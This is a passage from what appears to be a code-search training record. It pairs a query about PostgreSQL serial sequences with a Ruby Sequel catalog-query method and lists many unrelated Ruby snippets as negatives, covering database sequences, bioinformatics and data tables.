"0.44900894",
"0.44827604",
"0.44785562",
"0.44748482",
"0.4472459"
] |
0.6921501
|
1
|
Dataset used to determine normal serial sequences for tables
|
def _select_serial_sequence_ds
@_serial_sequence_ds ||= metadata_dataset.
from{[
pg_class.as(:seq),
pg_attribute.as(:attr),
pg_depend.as(:dep),
pg_namespace.as(:name),
pg_constraint.as(:cons),
pg_class.as(:t)
]}.
where{[
[seq[:oid], dep[:objid]],
[seq[:relnamespace], name[:oid]],
[seq[:relkind], 'S'],
[attr[:attrelid], dep[:refobjid]],
[attr[:attnum], dep[:refobjsubid]],
[attr[:attrelid], cons[:conrelid]],
[attr[:attnum], cons[:conkey].sql_subscript(1)],
[attr[:attrelid], t[:oid]],
[cons[:contype], 'p']
]}.
select{[
name[:nspname].as(:schema),
seq[:relname].as(:sequence)
]}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _select_custom_sequence_ds\n @_select_custom_sequence_ds ||= metadata_dataset.\n from{pg_class.as(:t)}.\n join(:pg_namespace, {:oid => :relnamespace}, :table_alias=>:name).\n join(:pg_attribute, {:attrelid => Sequel[:t][:oid]}, :table_alias=>:attr).\n join(:pg_attrdef, {:adrelid => :attrelid, :adnum => :attnum}, :table_alias=>:def).\n join(:pg_constraint, {:conrelid => :adrelid, Sequel[:cons][:conkey].sql_subscript(1) => :adnum}, :table_alias=>:cons).\n where{{cons[:contype] => 'p', pg_get_expr(self.def[:adbin], attr[:attrelid]) => /nextval/i}}.\n select{\n expr = split_part(pg_get_expr(self.def[:adbin], attr[:attrelid]), \"'\", 2)\n [\n name[:nspname].as(:schema),\n Sequel.case({{expr => /./} => substr(expr, strpos(expr, '.')+1)}, expr).as(:sequence)\n ]\n }\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def sequence_number; end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def qseq; @mrna.seq; end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def titulares_serial\n Representante.find(self.titular_ids_serial).map(&:nombre)\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def sequence\n @sequence\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def make_tnt_input(seq_arr)\n seq_arr_length = seq_arr[0][:seq].length()\n retstr = \"xread\\n#{seq_arr_length} 49\\n\"\n seq_arr.each { |sa| retstr << \"#{sa[:genus]} #{sa[:seq]}\\n\" }\n retstr << \";\\n\"\nend",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def data(opts = {})\n sources = self.attributes[:sources] || []\n seq_opts = {:kind => self.attributes[:kind].to_sym}.merge(opts)\n sequence = SequenceQuery.new(sources, seq_opts)\n seqs = sequence.sequences\n seqs.map do |seq|\n {\n :data => seq[1],\n :start_time => sequence.start_time_epoch,\n :source => seq[0]\n }\n end\n end",
"def generate_aasequences\n (0..self.sequence.length-1).each do |i|\n AAsequence.create(:seq_id=> self.seq_id,\n :amino_acid=>self.sequence[i],\n :original_position=>i)\n end\n end",
"def predict_format_converter usages\r\n @date = []\r\n @total = []\r\n @lines = []\r\n @labels = []\r\n @table_array = []\r\n usages[:daily_usage].each do |usage|\r\n @date.append(usage[:date].to_s)\r\n\r\n @total.append(usage[:usage])\r\n end\r\n @table_array.append(\"date[i]\")\r\n @table_array.append(\"total[i]\")\r\n usages[:daily_time_periods].each_with_index do |period, index|\r\n @name =\"lines[#{index.to_s}][i]\"\r\n @table_array.append(@name)\r\n @lines.append([])\r\n @labels.append(period[:label])\r\n period[:daily_usage].each do |usage|\r\n @lines[index].append(usage[:usage])\r\n\r\n end\r\n end\r\n end",
"def table_array\r\n @table_array\r\n end",
"def hseq; @seq2.seq; end",
"def prepare_sequence(sequence)\n nv = remove_non_amino_acids(sequence)\n split_sequence(nv)\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def getFtsNtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def qseq; @seq1.seq; end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def getFtsProtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if ftH.has_key? \"pseudo\"\n next\n end\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n pep = ftH[\"translation\"][0] if !ftH[\"translation\"].nil?\n pepBioSeq = Bio::Sequence.auto(pep)\n seqout = pepBioSeq.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def sequence\n return @sequence\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def table \n table = data.map do |slot|\n slot.position.to_s.ljust(12) + slot.license_plate.ljust(19) + slot.color + \"\\n\" if slot\n end.join('')\n end",
"def data\n data = (@transpose ? @data.transpose : @data).clone\n data.shift\n data\n end",
"def seq\n Sequence::NA.new( fetch('').gsub(/ /,'').gsub(/\\d+/,'') )\n end",
"def generate_sequence(comparison)\n identifier = []\n identifier << {\n \"system\" => \"https://precision.fda.gov/fhir/Sequence/\",\n \"value\" => comparison.uid,\n }\n\n coding = []\n %w(ref_vcf ref_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n coding << {\n \"system\" => \"https://precision.fda.gov/files\",\n \"code\" => input.user_file.dxid,\n \"display\" => input.user_file.public? ? input.user_file.name : input.user_file.dxid,\n }\n end\n\n standard_sequence = { \"coding\" => coding }\n\n app = App.find_by(dxid: COMPARATOR_V1_APP_ID)\n coding = []\n\n if app\n coding << {\n \"system\" => \"https://precision.fda.gov/apps\",\n \"code\" => app.dxid,\n \"display\" => app.title,\n \"version\" => app.revision.to_s,\n }\n end\n\n method = {\n \"coding\" => coding,\n }\n\n quality_data = {\n \"type\" => \"unknown\",\n \"standardSequence\" => standard_sequence,\n \"method\" => method,\n \"truthTP\" => comparison.meta[\"true-pos\"].to_i,\n \"truthFN\" => comparison.meta[\"false-neg\"].to_i,\n \"queryFP\" => comparison.meta[\"false-pos\"].to_i,\n \"precision\" => comparison.meta[\"precision\"].to_f,\n \"recall\" => comparison.meta[\"recall\"].to_f,\n \"fMeasure\" => comparison.meta[\"f-measure\"].to_f,\n }\n\n # For ROC data points, convert them to floats before exporting\n meta_roc = comparison.meta[\"weighted_roc\"]\n\n headers_map = {\n \"score\" => \"score\",\n \"true_positives\" => \"numTP\",\n \"false_positives\" => \"numFP\",\n \"false_negatives\" => \"numFN\",\n \"precision\" => \"precision\",\n \"sensitivity\" => \"sensitivity\",\n \"f_measure\" => \"fMeasure\",\n }\n\n if meta_roc[\"data\"].present?\n headers = {}\n\n meta_roc[\"header\"].map.each_with_index do |h, i|\n new_key = headers_map[h]\n\n case h\n when \"score\", \"true_positives\", \"false_positives\", \"false_negatives\"\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_i }\n else\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_f }\n end\n end\n\n quality_data[\"roc\"] = headers\n end\n\n quality = []\n quality << quality_data\n repository = []\n\n %w(test_vcf test_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n repository << {\n \"type\" => \"login\",\n \"url\" => \"https://precision.fda.gov#{pathify(input.user_file)}\",\n \"name\" => \"PrecisionFDA\",\n \"variantsetId\" => input.user_file.dxid,\n }\n end\n\n {\n \"resourceType\" => \"Sequence\",\n \"type\" => \"dna\",\n \"coordinateSystem\" => 1,\n \"identifier\" => identifier,\n \"quality\" => quality,\n \"repository\" => repository,\n }\n end",
"def sample_data\n %w(A,B,1 A,C,2 B,C,3 B,D,3 C,D,1 B,E,2 D,F,3 D,E,3 E,G,3 F,G,1)\n end",
"def serial_adj\n serial_word\n end",
"def list_sequences(starts_with)\n self.select_rows(\"SHOW TABLES LIKE '#{starts_with}%_sequence'\").map { |result| result.first.gsub('_sequence', '') }\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def sequence\n if !sequence?\n raise NotImplementedException, \"Attempted to get the sequence of a velvet node that is too short, such that the sequence info is not fully present in the node object\"\n end\n kmer_length = @parent_graph.hash_length\n\n # Sequence is the reverse complement of the ends_of_kmers_of_twin_node,\n # Then the ends_of_kmers_of_node after removing the first kmer_length - 1\n # nucleotides\n length_to_get_from_fwd = corresponding_contig_length - @ends_of_kmers_of_twin_node.length\n fwd_length = @ends_of_kmers_of_node.length\n raise \"Programming error\" if length_to_get_from_fwd > fwd_length\n revcom(@ends_of_kmers_of_twin_node)+\n @ends_of_kmers_of_node[-length_to_get_from_fwd...fwd_length]\n end",
"def sequence\n return self.dna.sequence\n end",
"def create_column_data_array\n\ttable_id = create_table_id('../data/census_column_metadata.csv')\n\tcolumn_id = create_column_id('../data/census_column_metadata.csv')\n\t\n\t[title_processor,table_id,column_id].transpose\n\nend",
"def table_data\n @building_groups.reduce([]) do |table, bg|\n table << energy_row(bg)\n end\n end",
"def sequence_separator; end",
"def convert_serial_to_identity(table, opts=OPTS)\n raise Error, \"convert_serial_to_identity is only supported on PostgreSQL 10.2+\" unless server_version >= 100002\n\n server = opts[:server]\n server_hash = server ? {:server=>server} : OPTS\n ds = dataset\n ds = ds.server(server) if server\n\n raise Error, \"convert_serial_to_identity requires superuser permissions\" unless ds.get{current_setting('is_superuser')} == 'on'\n\n table_oid = regclass_oid(table)\n im = input_identifier_meth\n unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))\n raise Error, \"could not determine column to convert from serial to identity automatically\"\n end\n column = im.call(column)\n\n column_num = ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n get(:attnum)\n\n pg_class = Sequel.cast('pg_class', :regclass)\n res = ds.from(:pg_depend).\n where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').\n select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])\n\n case res.length\n when 0\n raise Error, \"unable to find related sequence when converting serial to identity\"\n when 1\n seq_oid, already_identity = res.first\n else\n raise Error, \"more than one linked sequence found when converting serial to identity\"\n end\n\n return if already_identity\n\n transaction(server_hash) do\n run(\"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT\", server_hash)\n\n ds.from(:pg_depend).\n where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').\n update(:deptype=>'i')\n\n ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n update(:attidentity=>'d')\n end\n\n remove_cached_schema(table)\n nil\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def dataset\n @dataset ||= generate_dataset\n end",
"def seq\n if @seq.nil?\n @seq = ''\n self.exons.each do |exon|\n @seq += exon.seq\n end\n end\n return @seq\n end",
"def serial_no\n [doc_series, doc_no].join(' ')\n end",
"def to_s(tab,table)\r\n\t\ts = \"\"\r\n\t\tif @instrucciones != nil\r\n\t\t\ts << @instrucciones.to_s(tab,table) + (\" \"*(tab))+\"Sequencing\\n\" + @instruccion.to_s(tab+1,table)\r\n\t\t\r\n\t\telse\r\n\t\t\ts << @instruccion.to_s(tab,table)\r\n\t\tend\r\n\r\n\t\treturn s\r\n\tend",
"def sequences(name = nil)\n query(PostgreSQLExtensions::Utils.strip_heredoc(<<-SQL), name).map { |row| row[0] }\n SELECT c.relname AS sequencename\n FROM pg_class c\n WHERE c.relkind = 'S'::\"char\";\n SQL\n end",
"def seq\n @values.fetch('seq') { \n @values['seq'] = nil\n }\n end",
"def dataset\n database[table_name]\n end",
"def five_prime_utr_seq\n return self.seq[0, self.coding_region_cdna_start - 1]\n end",
"def ll_table\n\t\ttable = {}\n\t\tnon_terminals.each do |non_term|\n\t\t\ttable[non_term] = {}\n\t\t\tp_sets = predict_sets(non_term)\n\t\t\tp_sets.each_index do |i|\n\t\t\t\tp_sets[i].each do |term|\n\t\t\t\t\ttable[non_term][term] = i\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\treturn table\n\tend",
"def cds_seq\n cds_length = self.coding_region_cdna_end - self.coding_region_cdna_start + 1\n \n return self.seq[(self.coding_region_cdna_start - 1), cds_length]\n end",
"def prepare_dataset\n @working_dataset.dataset.each { |tuple| @clustered_dataset[tuple] = -1 }\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def start; @sequence[0]; end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def remove_inserts\n\n currseq = \"\"\n currname = \"\"\n # TODO: extract this from all methods to a helper class \n @content.each do |line|\n # if name anchor is found start a new bin\n if (line =~ /^>(.*)/)\n # check if we found next bin\n if (currseq.length > 0)\n # push name and sequence to containers\n @names << currname\n @seqs << currseq\n end\n # name is found next to anchor\n currname = $1\n # no sequence data yet\n currseq = \"\"\n else\n # append sequence data\n currseq += line\n end \n end \n # collect the data from the last bin\n if (currseq.length > 0)\n @names << currname\n @seqs << currseq\n end\n \n match_cols = []\n \n # Determine which columns have a gap in first sequence (match_cols = false)\n residues = @seqs[0].unpack(\"C*\")\n residues.each_index do |num|\n if (residues[num] == 45 || residues[num] == 46)\n match_cols[num] = false\n else\n match_cols[num] = true\n end\n end\n \n # Delete insert columns\n @names.each_index do |i|\n # Unpack C : 8-bit unsigned integer , push -> Array\n residues = @seqs[i].unpack(\"C*\")\n seq = \"\"\n # traverse over Integer Representation\n residues.each_index do |num|\n # If the base Sequence has no gap then check current sequence \n if (match_cols[num])\n if (residues[num] == 45 || residues[num] == 46)\n # Add gap to Sequence\n seq += \"-\"\n else\n # Add the Residue to Sequence\n seq += residues[num].chr\n end \n end \n end\n # Remove anchoring String Characters\n seq.tr!('^a-zA-Z-','')\n # Push an Upper Case representation to the @seqs array\n @seqs[i] = seq.upcase\n # Check whether all sequences have same length as parent\n if (@seqs[i].length != @seqs[0].length)\n logger.debug \"ERROR! Sequences in alignment do not all have equal length!\"\n end\n end\n end",
"def initialize(primary_key, uuid, uti, note)\n # Set this objects's variables\n super(primary_key, uuid, uti, note)\n\n # This will hold our reconstructed table\n @reconstructed_table = Array.new\n\n # These variables hold different parts of the protobuf\n @row_items = Array.new\n @table_objects = Array.new\n @uuid_items = Array.new\n @type_items = Array.new\n\n @total_rows = 0\n @total_columns = 0\n\n # This will hold a mapping of UUID index number to row Array index in @reconstructed_table\n @row_indices = Hash.new\n\n # This will hold a mapping of UUID index number to column Array index in @reconstructed_table\n @column_indices = Hash.new\n\n # This will hold the table's direction, it defaults to left-to-right, will be changed during rebuild_table if needed\n @table_direction = LEFT_TO_RIGHT_DIRECTION\n rebuild_table\n end",
"def calculate_deps\n SequenceDependency\n .where(ALL_SEQ_DEPS, device.id)\n .where(dependency_type: \"Point\")\n .where(dependency_id: points.pluck(:id))\n .map(&:sequence)\n end",
"def seq\n return self.slice.seq\n end",
"def hseq; @genomic.seq; end",
"def protein_seq\n return Bio::Sequence::NA.new(self.cds_seq).translate.seq\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << 